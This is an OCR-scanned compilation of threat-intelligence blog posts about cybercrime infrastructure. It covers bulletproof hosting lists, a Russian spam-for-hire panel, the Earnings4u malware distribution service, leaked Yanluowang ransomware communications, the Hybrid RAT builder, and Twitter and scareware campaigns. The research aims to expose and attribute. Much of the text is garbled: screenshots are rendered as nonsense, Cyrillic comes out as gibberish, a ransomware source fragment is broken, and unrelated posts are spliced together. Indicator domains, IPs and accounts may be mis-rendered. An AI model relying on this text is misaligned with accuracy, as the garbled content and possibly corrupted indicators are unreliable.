Cnam xocTuHr 


«SPAM HOST» Tapud CTAHDAPT See 


STANDART 


«SPAM HOST» Tapud MPOMO> es 4 


[2] 
[3] 
[4] 
[5] 
[6] 
[7] 


It should be clearly noted that in today’s modern cybercrime ecosystem which is largely driven 
by the existence of bulletproof hosting providers which basically either ignore abuse notifica- 
tions or on purposely launch rogue and fraudulent online hosting operations using their own 
resources or in combination with cloud-based service providers who unknowingly participate 
in such type of fraudulent and rogue bulletproof hosting schemes including actual malicious 
software spam and botnet C &C hosting we’ve continuing to observe an increase in the overall 
volume of these providers where we’re also witnessing their use by both novice and experi- 
enced cybercriminals where the ultimate goal would be to increase the average time it takes 
for vendors organizations and researchers to take offline their rogue fraudulent and malicious 
campaigns. 


In this post I'll discuss several of the high-profile bulletproof hosting providers that were active 
circa 2010 and I'll provide some actionable intelligence on the infrastructure behind them with 
the idea to assist everyone in their cyber attack and cyber campaign attribution efforts. 


¢ Recommended reading - [8]Historical OSINT - How TROYAK-AS Utillized BGP-Over-VPN To 
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Serve The Avalance Botnet 


Sample screenshots include: 


[9] 
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sharedl0.mchostru 


[10] 
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[11] 
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6. http: //garwarner. blogspot .com/2009/09/koobface-wrecks-search-results.htm 
7. http://ddanchev. blogspot .com/2009/04/confickers-scarewarefake-security.htm 


9. http: //ddanchev. blogspot. com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.htm 


10. 

11. 
12. 

13. http://en.wikipedia.org/wiki/Ali_Baba_and_the_Forty_Thieves_%281944_ film7%29 

14. 

15. 
34136 


16. http://ddanchev. blogspot .com/2009/07/diverse-portfolio-of-fake-security_27.htm 


17. bttp://www.virustotal.com/analisis/fc49e1fb731ae959262b2237494e0cd39e1c5399f 4f d56a1e40276053a0e693f - 12531 


8. http://www. virustotal .com/analisis/9c23d2c48bc5912869f 2cceelcf8798cb8b9£466996c96538546c7 466ae7 10ef - 12530 
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. http: //ddanchev. blogspot .com/2009/08/movement- on-koobface-front-part-two.htm 


N 
WwW 


. http://ddanchev. blogspot . com/2009/08/movement- on-koobface-front.htm 

24. http://ddanchev. blogspot . com/2009/07/koobface-come- out-come-out-wherever-you. htm 
25. http://ddanchev. blogspot .com/2009/07/dissecting-koobface-worms-twitter.htm 

26. http: //ddanchev. blogspot . com/2008/12/dissecting-koobface-worms- december . html 

27. http://ddanchev. blogspot .com/2008/11/dissecting-latest-koobface-facebook.htm 


ttp://ddanchev. blogspot .com/2008/12/koobface- gang-mixing-social-engineering.htm 


29. http://ddanchev.blogspot.com/ 


5.9.8 The Ultimate Guide to Scareware Protection (2009-09-18 19:03) 


Throughout the last two years, [1]scareware (fake security software), quickly emerged as the 
single most profitable monetization strategy for cybercriminals to take advantage of. Due to 
the aggressive advertising practices applied by the cybercrime gangs, thousands of users fall 
victim to the scam on a daily basis, with the gangs themselves earning hundreds of thousands 
of dollars in the process. 


This [2Jend user-friendly guide aims to educate the Internet user on what scareware is, 
the risks posed by installing it, how it looks like, its delivery channels, and most importantly, 
how to recognize, avoid and report it to the security community taking into consideration the 
fact that 99 % of the current releases rely on social engineering tactics. 
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Oreiiteat RTKTRET SN = reklemadey MySQL reklamadey 0.146 
| Gestiges gienrse rektamalove MySQL reklemalove 0.081 
— reklamasay MySQL reklemasay 0.064 
te reklematpen MySQt reklamaspam 0.158 
v stestandat MySQL shestandert (0.442 
———— soem-emed MySQL spam-emed 0.072 
Remecoesar: (cron) whe soa  cadelnane ease 
lero noaasnmt Stangartoash MySQL standertcash 0.995 
Web-ompermes standertmedia MySQL standertmediy O.sAz 
Yrmner sen Ms wantartnedng MySQL standertnedvig 0.030 
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Standartmedia J 7 


@ wtrechotsus: O homer Stent: Bie O ter 


Related bulletproof hosting providers that were active back in 2010 include: 


hxxp://securehost.com 
hxxp://ccihosting.com 
hxxp://wrzhost.com 
hxxp://underhost.com 
hxxp://shinjiru.com 
hxxp://offshorehosting.com 
hxxp://offshoreracks.com 
hxxp://hostimizer.com 
hxxp://zentek-international.com 
hxxp://anonhoster.com 
hxxp://webcare360.com 
hxxp://altushost.com 
hxxp://anonymoushosting.org 
hxxp://nodmca.nl 
hxxp://goip.com 
hxxp://serverslease.net 
hxxp://e-investhost.com 
hxxp://eukhost.com 
hxxp://adulthosting.com 
hxxp://webhostingchoice.com 
hxxp://adulthostingservers.com 
hxxp://hostsearch.com 
hxxp://adult-host.ru 
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hxxp://layeredlink.ru 
hxxp://xlhost.ru 
hxxp://park-web.ru 
hxxp://web750.com 
hxxp://cirtexhosting.com 
hxxp://wlw.su 
hxxp://warez-host.com 
hxxp://abuzhost.ru 
hxxp://peterhost.ru 
hxxp://fastvps.ru 


Stay tuned! 
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18.10.44 A Peek Inside a Russian Web-Based Managed Spam Service - An Analysis 
(2022-10-31 11:04) 
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AgmM VvHKa Cnnicox 2aKa7aNMbIx pacceinoK 


$0.00 USD C gare 1420010 No aaryi 16042010 EE==s 


Le] Crary< Obvem Detrann Bpema crapta 


Mow saKaaet 


With spam continuing to proliferate globally that also includes the use of spam for serving 
malicious software largely populating a variety of botnets on a daily basis including the ever- 
growing use of client-side exploits for the purpose of affecting hundreds of thousands of users 
on a daily basis I’ve decided to take a peek inside a Russian-based managed spam service that 
let’s users launch massive and widespread spam campaigns in a DIY (do-it-yourself) fashion. 


Sample screenshots include: 


[2] 
AgMuUHKa 3 Muecemo ana pacceunim & 4 
Yearoempie Aamo rocnona! 
$0.00 USD fi aay = 
JaKas2T OTEK 
Cetpare tron 
in 
hapor 
Mecee Meino ¢ naponem 
-Uasvepn aaty sanycKa 
18022016 
etree cara sad 4 
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AgMUHKa BakazaTe paccpinky 


Cronmocts pacceinxn 140 WMZ 
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JIKdI2Te pacceainy 


Nowan pacthana =a 
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AgmMuHka 3akasaTe paccbinxy 


$0 00 USD Cronmocts pacceinxn: 140 WMZ 


JaKaIaTe pacceeiKy 


Nowan pacthanta = 
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AgMuHKa SaKasaT» pacepinxy 


$0.00 USD Cronmocts pacceinnne 140 WMZ 


JaKkaI2Te pacceeiny 


Honan pactanca =a 
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Stay tuned! 
https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVVXsEgEBUcP2w9rI_p4FU34d4EAC9 jNQTngg- YBICHaAf pK4dQI 


fcHd61kJOTHTQWdgagtM_vVLLtGODzmKXMNn911CRKm8qTC55ACpKm 
https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEg506hB76bp109w1x4BCS6 j TLBTPDOV50XP JP-S2KmezTYZk 


XTytRx21D5cnsUOWLMEkIkI698PnwigaFFtyZwgBx1lfMx-zERt56r2 
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18.10.45 A Peek Inside the Earnings4u Managed Malware Distribution Service - An 
Analysis (2022-10-31 12:10) 


» ABOUTUS ; -CONDITIONS ; . . FAQ ; . CONTACTS 
———<—————— ——— ———————— TT —SS 


ram «Earning4u» 


from 6$ to 180% 


Key Features 
—— es 


Dear blog readers, 


I’ve decided to offer an in-depth inside peek inside the Earnings4u managed malware distribu- 
tion service circa 2010 with the idea to raise awareness on the ease of use and the actual trend 
where novice and experienced botnet masters can easily acquire the necessary seed popula- 
tion in terms of purchasing access to malware infected hosts which could be further used to 
spread their malicious software campaigns including spam and phishing campaigns. 


With managed affiliate-network based revenue sharing schemes continuing to proliferate it 
shouldn't be surprising that more cybercriminals are actually looking for ways to monetize 
access to their acquired through blackhat SEO including various other rogue and fraudulent 
techniques traffic including users who would be interested in offering managed and centralized 
ways for spreading other cybercriminal’s malicious releases in a systematic and efficient way 
leading to today’s modern cybercrime ecosystem reality where both novice and experienced 
cybercriminals rely on rogue and malicious affiliate-network based revenue sharing schemes 
for both revenue generation and the spreading of malicious software. 


Sample screenshots include: 
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EARNING 


14.02.2010 
15.02.2010 
17.02.2010 
17.02.2010 


17.02.2010 


Fresh loader and 25 AV scans 


Statistics 
I 


] Regions 
Date Downloads [UK| NL] FRI PLIIT| OE | ES|AU| GR] Other | 


| Total_| = a a] (aa FT [aa 
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Please, enter validation code 
from unage for .exe access 
< <> 


ty ws 
x if) 4 
a : bh. wi 
SEE Ot ES. Be) 


Code: lavage 


DO NOT use public AV scanners like VirusTotal. 
We scan our .exe every hour special for you. 


Result: 


Norman 242.2010 1:36:48 - vira 02,03,2010 20:33:28 - 


4-Squared 02.03.2010 16:50:08 loader.exe KA V8 02.03.2010 12:15:18 loaderexe 
rojan. Win32 InjectlIK rojan HTML Frauds 
Sophos 02.03.2010 18:16:42 loader.exe MalFekeAV-AX PrWeb- 


OneCare 1.3.2010 9:20:50 loader.exe->(UPX) 
rojan: Win32/Hamig,gen!D loader. exe 
rojan' Win32/Hamig. gen!D 


OD32 02.03.2010 22:08:02 loader.exe a variant of 
4vast 02.03.2010 - Win32/Kryptik.CNF loader.exe 0 UPXv12_m2a 
ariant of Win32/Kryptik.CNF 
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Please, enter validation code 
from image for .exe access 


\ < 


DO NOT use public AV scanners like VirusTotal. 
We scan our .exe every hour special for you. 
Result: 


Acai 172010190508 


[5] 
213.229.79.174 ——_tifl gm» 213,229.64,0/18 im 4529550 
com 213-229-79-174 static.as29550.net 


earning4u.com 


nsleamingdu.com ——A——_—ge  95.168.186.55 
allt 95 168.260.0019 —Aige As28753 
ET 


Ni 
ns2.eaming4ucom ——A—_____m> 195.168.174.182 ———— 
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This post has been reproduced from [3]Dancho Danchev’s blog. 


1. http: //en.wikipedia. org/wiki/Scareware 
2. http://blogs.zdnet .com/security/?p=429 
3. http: //ddanchev. blogspot .com/ 


5.9.9 Dissecting September’s Twitter Scareware Campaign (2009-09-25 12:03) 


service that lets 


t ange of quick, frequent 
are downg? Join today to s 


ee | knab190 


Gotcha!, glee! 
http://tinyurl.com/msjjv8 


UPDATE: 4 hours after notification, Twitter has suspended the remaining bogus accounts. 
[1]Until the next time, when the reCAPTCHA recognition gets [2]cost-effectively outsourced 
for automatic [3]scareware-serving purposes. 


Over the last couple of days, my Ukrainian "fan club" - fan club in a sarcastic sense due 
to [4]the love, more [5]love, even [6]more love and [7]gratitude shown so far - has once 
against started abusing Twitter by automatically generating bogus accounts [8]tweeting 
scareware serving links by syndicating Twitter’s trending topics. 


This traffic acquisition tactic is in fact nothing new, and in the case of this Ukrainian cy- 
bercrime enterprise, is done "in between" the rest of their malicious activities. What’s worth 
pointing out is that just like the most recent [9]malvertising campaign at NYTimes.com, the 
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18.11 November 


18.11.1 Yanluowang’s Ransomware Group’s Internal Communications Leaked by 
Russian Threat Actors - An Analysis (2022-11-01 12:44) 


[1] 


QO VANLUOWANG_LEAKS 
GI Ywi_Leaks 


Yanluowang’s ransomware group has recently had their internal communications leak online 
prompting various researcher into looking into them and analyzing them. The breach of the 
gang’s internal communications happened courtesy of Russian threat actors who also defaced 
and left a message on their front page. 


The leak’s initiative has also released various source code in terms of the decryption tool for 
the ransomware including the source code of the builder. 


Sample screenshots include: 
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void 
sifd 


Bend 
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ecryptBighk i lel PCHAR 
ef DEBUG 
if 
= FALSE 
LARGE _INTEGER 
LiFilePos .Qua 


LA INTEGER 


LARGE INTEGER 


LicerPes .QuadPar F 
LARGE_INTEGER LiFileStep; 


FileStep.QuadPart = 20 * 1024 
Sourcef . ALL 


string sFilePath(szrFilePat 
wstring wsFilePath trtomstr 
ePath( sFilePath. begin 


+ wsFilePath; 


an luowa 


Mane . find 


npos 


ohare strtowstr(s 


NaF i lew, sOLGF i leNane.b . sOLGF it 


wiNewt i leNare strtowstr( sWewf i leName) 


LeNane( sew? ileNane.begie(), sitewFi 


rror( (POR 


nit DecryptFile; 


LaF i LeMame 


«Nee 


e Name 


end( 


end( 
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gigabytes 


first of 


THETR UNAVAILA 


Mails ¢ co t 
1 caseymichel Leaea 


v content: 


https: //www.sendspace.com/file/6nhéle 

https: //xss.is/threads/61997/#post-413541 

https: //matrix.to/#/ 

https: //matrix. to/#/@saint:matrix.mtololo.com 

https: //matrix.to/+/ 

https: //matrix. to/#/@saint:matrix.mtololo.com 

https: //matrix. to/#/ 

https: //matrix. to/#/@saint:matrix.mtololo.com 

https: //matrix. to/#/ 

https: //matrix. to/#/@saint:matrix.mtololo.com 

https: //matrix. to/#/ 

https: //matrix.to/#/@saint:matrix.mtololo.com 

https: //xss.is/threads/6 1997/#post-413541 

https: //matrix. to/#/ 

https: //matrix. to/#/@saint:matrix.mtololo.com 

https: //xss.is/threads/61997/#post-413541 

https: //matrix. to/+/ 

https: //matrix. to/+/@saint:matrix.mtololo.com 

https: //matrix. to/#/ 

https: //matrix. to/+/@saint:matrix.mtololo.com 

https: //matrix. to/+/ 

https: //matrix.to/#/@saint:matrix.mtololo.com 

https: //matrix. to/#/ 

https: //matrix. to/+/@saint:matrix.mtololo.com 

https: //matrix. to/+/ 

https: //matrix. to/#/@saint:matrix.mtololo.com 

https: //matrix. to/#/ 

https: //matrix. to/#/@saint:matrix.mtololo.com 
[5] https: //matrix. to/=/ 


The recent communication leaks are similar to the Conti leaks which | extensively data mined 
and profiled [6]here. 


Related actionable intelligence on the C &C server infrastructure: 
hxxp://mtololo.com - 81.19.72.59 


hxxp://matrix.mtololo.com - 62.113.100.124 

Related domains known to have been involved in the campaign: 
hxxp://api.views-24.ru 

hxxp://lohicageeg.beget.app 

hxxp://fr124.aha.ru 

hxxp://aktiver-id.fun 

hxxp://aktiver-bankid.website 

hxxp://matrix.mtololo.com 

Stay tuned! 
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4. https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEgBz_THNRXc80r4y0pQArZ_pcYOObrD3gLg_OK-7t1RaPgD 


BL-q-xdXcCnObh1dIUM2rB6HWYAem0F9__9-fyWOEGwincK-10iTVM 
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6. https: //ddanchev. blogspot .com/2022/02/exposing- conti-ransomware-gang-osint_28.htm 
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18.11.2 A Peek Inside the Hybrid Remote Administration Control System Malicious 
Software - An Analysis (2022-11-02 04:25) 


[1] 


Dear blog readers, 


I’ve recently decided to take a peek inside my old threat intelligence research archives and 
I’ve decided to share some sample screenshots of a popular back in 2010 malicious software 
botnet release known as the "Hybrid Remote Administration Control System". 


An image is worth a thousand words. 


Sample screenshots include: 


[2] 


[3] 
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[ Terminal | [ Statistics and Control Panel | [ Hybrid Generator } [ Dictionary Files » Cmeking Progress | [ Hybrid Help | 


Set Configuration 


erminal | | Statistics and Co < ybrid erat Nictionary Files | [ F Ts h ess }[ Hybnd Help | 


Sleep-[lirea(in secs ) 


© Hybrid Remote Administration Control System 


enninal | [ Statistic } | FTP Cracking Progress || Hybrid Help 


» Hybrid Generator 


» Base Bot. Nase Hybrid 
» Directory to place bot: Gittins [tela 
» Detaull Stegp Tine 
» Home Server: localhost 
erver Port 60 
fweb! 
2 Script getcrndt pap 

» Bot's User Agen Hybrid_v.1.0 


e Autostart File ‘etc/prohie 


Generate New Hybnd Bot 


[6] 


©) Hybrid Remote Administration Control System 


1] [ Mybrid Generator } [ Dict ry File racking Pro [ lfybrid Help ] 


* Bip Ip « ° Diet Mile « » Action « 


FTP ip 


bn, | 


Dictionary File 
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Ukrainian gang keeps using domains already in circulation within their blackhat SEO campaigns, 
making it fairly easy to establish connections between these and the ongoing Twitter campaign. 


Hey there! zastrow994 is using 
Twitter. 
Twitter is a free service that lets you keep in touch with people through 


the exchange of quick, frequent answers to one simple quesbon: What 
are you dowmg? Join today to start recesving zastrow994's tweets 


“  zastrow994 


ie Not bad, really. See 
ht “ is. .gd/3BZqa 


ATT Diathost Pimp /enywrl commsyvé 
£2 et Sep 2300 Gem wet 
Nip a QUOTES creative Brand New Eyes 


Yaaay! D watching >Osstkt 0< movie Mere Nttp ieyurl comvensgvé 
oosT nh oh mua 


WARNOG!! Twitler worm and phishing scam! Ntip fa ga/Bo71S -- 
pesca pee, phiaps. HINTIT IT 


2 Bangs in Me | cant bve wits: Fuzzbal and HINT |) 
Nap NS Q3S8Zqa 


RT @iottan Even levenese oelegaies waked out on AN 
DMD 8 QUOTES iraneiecton GreenNy 


Jay-Z | past got a free iphone today toe justsutenaming my ema Oo 
yOu want 69871111 1Nmp i's OS SBZqa 


Arnendy wang Terme 
fom vow chore? Cie here. 


By the time Twitter suspends the automatically registered bogus accounts, on average, 70 to 
80 tweets have been published per single account. Here’s the most recent list of currently 


active Twitter accounts tweeting scareware links: 
twitter.com /verinal238 
twitter.com /knab190 
twitter.com /zastrow994 
twitter.com /gustave12 
twitter.com /trautwein9975 
twitter.com /reinke341 
twitter.com /ordella509 
twitter.com /lysa380 
twitter.com /weinhold344 
twitter.com /wachsmann1541 
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[11] 


Stay tuned! 
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Personal Antivirus 


Best Spyware Protection. Used by Millions World Wide: 


Personal Antrorus has been downloaded over 125 melhon bres with malhons more downloads 
every week People woridunde use and trust Personal Antrurus to protect ther PCs tom 
Spyware adware and other onhne threats 


Enhanced performance: 


Prowdes mdustry-eading protecbon without sacrificing performance: 
Fast scan and trowse speeds 

Less memory use than the average used by competing products: 
PC Secunty with industry leading vrus. spyware and Srewall protecbon 


Ease of Installation and Support 


Persone Antvinws @ among Tt Cosest peces of entviws 


Sete ere te natal RS TOME COMBAT fhe OW NORTD tA ed Ob Mey Lecome Beptane Print Me yee MOND 
~ Conguinaneies Views Oetostes Geckly OM METALANO BND RCDVANON Ore 8 BARD Aer te hoes vow Comowier DY DIRCIEE operat Ihe latest Mitrnet 
Yow Comevity Safa bre SNowtl be Mtvtue OM) eomy te OREO by AMES Oy wore HE Ome PertONe Antvnes, 
+ Seyware ond Agwore Protection he 05 Personal Antvirws ©. Whe® # Question Gees ares. (EMOAOE OD Mem TRCMA OME NO Biny OME BED OMERT 


Persone Antivirus NOs OtvOted eeQuete Mesow les 1 
200re88 Tem Vou Con ermal Or Cal for Ive techmce 


Dear blog readers, 


I’ve decided to share with everyone a portfolio of known scareware themed photos with the idea 
to raise awareness on what used to be the primary monetization vector within the cybercrime 
ecosystem circa 2010. 


An image is worth a thousand words. 


Sample screenshots include: 
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Protect against spyware, 


popups, and show performance. 


What Es Uitra Antivir 2009 ? » 
What ls Soymare? 
Sars of Sovware 

How do I get tra Anti 20087 


Ultra Antivir 2009 detects and removes harmful prograns 


Uarre Aceves 2000 uses edvenced NOCIRCIRY b> Ses kien cn asbanae enema by 


the activity on your PC Ura 2009 technology i able to hurt 
threats. 


down and paralyze new and dever 


Utra ArbiVe 2009 helps protect your computer against pop-ups, slow performance, and 


Benefits of using Ultra AntiVir 2009 include: 
Spyware and harmful files detection and removal 


Utra Arter 2009 quickly and easly finds spywere and cther harmful programs that can 
sow Gown your computer, Gsplay annoying Dop-ue ads, Change Internet settings, oF 
munuse your private informabon without your consert. 

Utra Arie 2009 elemnates Setected spyware easily at your drrecbon. 


are Nek 200) allows you ve SRSA TAR Seeaeaes bee ree eer nS 
convermert for you, whether «'s on-demand or ona ‘that you set. 


Improved Internet browsing safety and security 
Untra Arcive 2009 helps stop spyware before « installs Aself on your computer, 
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Scan results (_ olf 


KrAiMer 1.1 


8 Warning!!! 364 infected files found 
Click the “Erase all threats” button to erase all spyware and viruses from Windows 
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- Doctor Anitvirus 2008 


) DocteréAnti 


ala 
Doctor Antivirus 2008 


A 


Protect 


WARNING 40 infections found !!! 


Last scan detected malicious programs (4), viruses (6), adware (18), 
spyware (5), tracking cookies (7). 


These harmful programs can cause: 


bas 
bjan-Clicker. Wins. . 


Djan-Proxy. Win32. 

7 x] System crash Djan-PSW, Wiln32... 
= 

| vs Privac € Permanent Data Loss at 

bjan-Clicker HTML. 

e7.. x) System startup failures Djan-Downloader.. 

| Update x) System slowdown bjan-Dropper.MS.. 

bjan-PSW.Win32... 

| ty Settirn € Internet connection loss are Oroney.Wan?. 

€ infecting other computer on your network ee 

kdoor.Win32.Liv.. 


It is highly recommended that you remove all the threats from your computer immediately. 


To remove these threats immediately. vou need to register Doctor Antivirus 2008 
To do so, cick Remove all threats below. 


Get full real-time protection i sc OUR i pi aR aca ne 
H Infections Found: 40 
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What is Spyware 


Soyware, the a virus. ts a manhcous 
Sc@ware plarted on your PC by a turd 
arty 1 Ofer to secre®y monder what 
you Go onane 


Once yout Diowser; Nabes are 
anahaed. you are Sooded wah 
ensess Comenercais Popups and 
Spam fom inside pour PC! 


Soyware ats0 Crarnabcalty stows 
down your compater and internet 
COMMEDON SPCOCS 


Spyware cosects pour pate 
tefcemabon and sheats your iOenety 
DasEwords. CreGt card cetamts and 
omer 


Need Help? 


You Rave a protien wih 


your purchase oF you 
Need help? 


Cache neve 


Basic signs of Spyware infection 


if Me anawer to One of these Quessons ts “Yes, hen you are probally infected 
1 Your computer has slowed down 

2 Your internet conmecton speed has decreased 

2 You have downloaded maysic of sofware from the Wed 

4 You ptt popups and annoying ads when you re online or sornetenes even One 
S Your detault home page has been changed to he one you Gdn ast for 


6 You have an extra tocar mstalied and you dont now where ¢ came fom 


You recetve more spam emats Than ever 


Satisfaction guarantee 


Shep safety at wow spvwaleoreventes Com with the Spyware 
Preverter 100% satstacton guarantee Mf tor any reason you are 
Net Nappy WA your purchase, sunpty Contact our Customer 

SUpH Or stat werwn 30 Gays. and we will refund 100% of he 
PUNCRASe PNCO WIM NO Quesbons ashed AL 

WWW SPY War EDI eventer Com your Becurty and sabstacton come 
first If youre unhappy, weTe unhapey and wet make sure tat 
wont happen 
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$°F Power Antivirus 


| What is 
Spyware 


CHECK YOUR PC HOW 
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2008 New Version! 


Full Windows XP Service Pack 3 4 


Vista Compatinaity 


eAntivirusPro is a powerful mix 
of Anti-Malware, Anti-Virus, Anti-Trojan, 
i-Backdoor, Anti-Worm and Anti-PornoDial 


eAntivirusPro 


~ 


poacn Spyware SCH 
Monitoring 


in one program. It will protect you from all types of 


Viruses on your PC 


Main Overniew 


What is spyware? 


Spyware, tke a virus, ts a malicious so@ware planted on your PC by a 


identty, passwords. creat card details and other financial data 


eAntivirusPro key features 


Full Wirxdows XP Service Pack 3 Security Center Support! 


Rescue Scan Technatogy - With Ute figh speed scan rescusing yours PC 
trom Viruses for tew seconds! 


Urbmate Live Update Fach 2 how's ant virus bases and mockses are 
completety upxtated. entre vertnel over your pewacy and 
idenety! 


eAntivirusPro finds out and removes more than 100000 Trojan 
horses, Spyware. Viruses, Hachers, Adware, Keyloggers and 
another harmware 


@ANTIVITUSPrO allows scan fles Quickly and access otner 
features eAnmvirusPro Owecty tom Widows Explorer 


Removes “active trojan” from a disk even a it ts blocking the fe 


Removes trojan ties are locked for writing (for example OLLs 
being used) 


Best backdoor and worm protection 
Supports compressed tes scan 


[7] 


26189 


“=* Antivirus XP 2008 


Yee =) Free Check 
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Windows Antivirus 


What is Spyware 


Spyware, tie a virus, is a matcious 
sofware planted on your PC by a fwd 
Datly in ceder to secrety monwor what 
you 0) oraine 


Once your beowsing nates are 
hated. OU are Booed wih endess 
Commerciats, Popups and Spam from 
inside your PC! 


Spyware aso Gramascaty slows Gown 
yOur Computer and intemet comecton 
speecs 

‘Spyware collects your private 
indormaton and steals your Mentty 
PISSWOrGsS. Cet Card Getats and cher 


Ce 


Basic signs of Spyware infection 

It he anawer to one of these questions ts “Yes™, then you are probatty infected. 
1 Your computer has slowed Goan 

2 Your internet conmecton speed has decreased 

2 You have downloaded music of sofware from the Weo 

4 Vou get popups and annoying ads when youre online or Bometmes even ofine 
5 Your detautt home page has been changed to the one you Gidn't ast for 

6 You have an extra toolbar installed, and you dont now where & carne from 

7. You recetve more spam emats han ever 


CHECK YOUR PC NOW 
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Even Staller Than Over the Phone. 


ess] 3 | — fe 


Secure SLL Connection 
100% Privacy Guarantee 


propa 
$2 fom every sale we make will be 


whatever dis f boks ermpie - 
just 2 dollars, bet €'s a good mew start! 7? 


© 2009 Green AV Ab renes reserved 
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twitter.com /weishaupt917 
twitter.com /scheid1265 
twitter.com /fitz1677 
twitter.com /falkner425 
twitter.com /opel1409 
twitter.com /rasche1401 
twitter.com /schlecht1581 
twitter.com /verinal238 
twitter.com /perahta985 


Hey there! scheid1265 is using 
Twitter. —_—— 


the exchange of quick, frequent arrswers to one sample quesbon Wiha 
are you downy? Join today to start recening scheid 1265's tweet 


scheid1265 


http://xrl.us/bfnrw8 - The word vagina 
just showed up on my Twitter feed, 
not once, but twice. Thanks 
@billboarddotcom and @DuJLinje! 


The accounts are relying on identical short URLs, with the following ones still active and in 
circulation: 

tinyurl.com /lyby2r 

tinyurl.com /nx39k8& 

tinyurl.com /lyby2r 

tinyurl.com /mnbfox 
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. ,._,, Todo-en-unoPAQUETE INTEGRADO 
SS SumejorAntivirus 


sistema 


DESCARGAR AHORA 


‘Su pe ubberns Qube neCesd 4 Summeyor Artie us? 


Surrepotintvirus esth Gnighto 2 aQue‘OS Usuarios Que traDajan actvarnerte com su PC Sumejcearovrus ests Grigide a 
Naevegan por internet y por efo corren ef Nesp de ter infectados La presencia de virus Pa velos UtUaNOS Que DUST an 
PUbSE Produtin Clertos Prodlemas el sistema Gejare de fuNcionar, su informacién protecchdn para sus Com@tagoras 
Dersonal come datos de taretas Ge crécto- serd sustaitay os pop-ups No Gejarén Si tu PC a menudo te ve afectads 
de rrobestarto. for los ataques de virus y gutancs 

éormsscos o $i sus KOvdades en 
Nuestra setacain internet son registadas, ertonces 
este es ef soAware indk a6) 
Trabaye (On Seguridad ynavegue 
bor Indernet sin preocupaciones 
Con Sumeputotvirus estacd 
brotegdo cortra 000 too Ge 
amenatat! 


SurmeptAntvirus le perrrete cortrotar tu PC Si tu computador es tu herrarreenta 
CobGana Mas vabOs a, tanto ef ef HOQEE COMO en la China, esta sohtiCn le encantars 
ye Que anaiizars @! sistema en busca Oe virus y Malware, evtard la mvatidn de tu 
Dtivatidad y protepers la PC 


Cory gat © 200 Mem Dererstes Tertariogian KID ine Todor lon derechos renew ates 
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N PCAntivirenLoesung 


SCHUTZEN SIE IHR 
SYSTEM VOR VIREN 
SOFORT! 

Ohne Viren leben! 


Arty 


Hous 
Support 


Sofort kaufen 


IHR PROBLEM WER BRAUCHT PCAntivirenLoesung? 
PCArOvrerdcesung wurde ipenel fir Ge 

Menschen proOutiert, he aby ihre PC'S 

benutzen. im interme? surten und Viren 

wtangen ann Viren kianen Pu System 

witser Betred settien laste Pope. 

Werburrye Degen) tee Daten vernn nten 

oder persorikhe Informatonen, 2B $ LFUNKTIONEN 
breaQuctencurrener stenien 

UNSERE LOSUNG 

PC ALQvTett 08 tity) hy et Irnen Korecie 

Ger Bren PC zu erhaiten Falls Ite PC ein 

nstumnet Mier laginnen Arbed ist 

bendegen Sie diese Programm, wed es 

ren PC vee Viren, nternetangntien uno 

Specnageprogrammen initt 
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Votremeilleuranti 
Virus 


Le aveillews entivius 


— *) PROTEGEZ VOTRE 
SYSTEME DES VIRUS 
MAINTENANT! 


Assistance 


Achetez 
maantenant 


Fonctions principales 


* Fournd la protection efcace contre tous les virus, vers ot 
ovens conus 

* Prévient vote PC de la poration des espions et 
pubikiels et protege completement vote contidentaite 

* Détrud les pop-ups ennuyartes avant quetes se chargert 
Gans votre PC 

* Anaiyse regubbrement voke PC en virus et aulres logiciels 
materi ants: 

* Met & jour les bases Ge données vrales 

* Garant fassistarce aux cherts professionnetie gratuite 


Votre probleme 

Votreitedieurravirus 2 étb crbé pour Cour qui uBisert langement leurs ordinateurs personnels, pour Ceux qui naviguent suf intemet 
et sont en danger dinecton. Le systema de vore PC peut events inopérant 4 Cause des virus, vos données perscanetes, y 
compris Nefeematon sur les canes Ge créct peuvert dre voldes Cu Dien vous pouver dre enriayé des pop-ups NON Obsirbes. 


Notre solution 
VotreitesieurAroveus vous permet de controler compltternert votre PC Si votre ordinateur est un custl précheur de vore tava cu de 
tote, vous spprecierer Ce programme, parce qu’ garde vote systhrne des virus ef ales programmes Mmatvedtants 4 face des 


anaiyses régubéres, aussi, # vous protepe des wolstons de votre ConSdertsite et vous fournd une profecton complete ef eficace 
Oe votre ceainateut 


Qui a besoin de VotreMeileurAntivirus? 
VotreiteteuAroerus est pour ceux qui vetent protege leurs ordinateurs Si votre PC est souvent ataqué Oe virus et de vers et 
QueiquUn @s4.ate Ge Sure vos actviies Sut internet, aices, ce logiciel est pour vous. Travadie: en sécurte et utiser internet sans 
BuCUNe INGuNetIGE Avec VoreltesieuAroveus vous ée5 protege cortre toutes les menaces existartes! 
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klantenondersteuning Koop nu ogin 


BESCHERM UW SYSTEEM NU TEGEN DE VIRUSSEN! 


PCOevedspings sysieem werd speciaal Cntworpen voor 
Ge gedrukers die actef hun comouter peteuken en voor 
iOnteen Ge in het wed su en risico lepton door de 
virussen besmet te worden Uw syiteem kan 
Noperadones! 1aken Goce Ge sChadelgne inwined van de 
VITUS SAN, Uw DErLOOMiike GegevEns, ZO9!5 


PCOevetezings sysioem maaat het woot u meget 
om vollegg uw PC te comPoleren Ais uw PC uw 
[heesl wardrvote helper in het daagtykse leven Is 
Pus en Op het werk, dan is dt de cplossing voce U 

Net Nout uw sysleem vrij van Oe vrussen en 
atherie! matware doormedde! van regeimatge 
kaamummers en gegevens, kunnen gestoien worden stand, beschermt u tepen Oe schending van uw 
nu hurd lastpzevatien worden doce Ge irtante en Dervacy en Diet vollecepe Deschermeng aan uw 
Coprwenste popups syiteem 


J 


We heeft PCBev em nodig? De sleuteleigenschappen 


PC Bevemigings systeem is voor de petevkers Ge hun 


PC's fark wersen be beschermen tegen de virussen ALS 


uw PC regeimaty door de virusten en wormen 
BaMDevElheN Wort dan word! U MOOD SBwaaes Cheniyk 
Goce emand sangevaten die uw internetactyteten 


+ Long voor een ettecterve benchermng tegen ale 
gekerde vrutten wormen en Trane 

» ted een effecterve bescherming tegen de riraat m 
a PC doce de 1pywwemdware en bencherst uw 


preeacy 


errmtg de vervetenae popup: pw scheme 
ver ochgnen 

» Scart regetmatg uw PC op erusnen en matware 

+ Update de vein sergegeveratestand en arctere 

be stander 

> Carandeert persconiie en grate kisrtencnder tteuning 


werrst na te volgen en ts deze sofware Oe Oflos sing 
voor u Werk vetig en pebruk het interne! zonder angst 
